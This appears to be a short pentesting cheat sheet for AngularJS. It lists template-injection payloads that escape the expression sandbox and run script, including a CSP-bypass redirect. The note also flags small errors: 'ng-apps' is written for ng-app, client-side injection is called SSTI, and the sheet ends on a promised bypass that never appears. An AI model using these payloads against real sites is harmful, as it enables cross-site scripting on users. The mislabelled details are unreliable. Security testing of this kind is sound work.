Angular Pentesting
AngularJS is a web application framework.
HTML Attributes
If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code.
Server-Side Template Injection (SSTI)
{{2*3}}
{{$on.constructor('alert("test")')()}}
{{constructor.constructor('alert("test")')()}}
<input ng-focus=$event.view.alert('test')>
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
It worth testing to bypass sanitizing as below.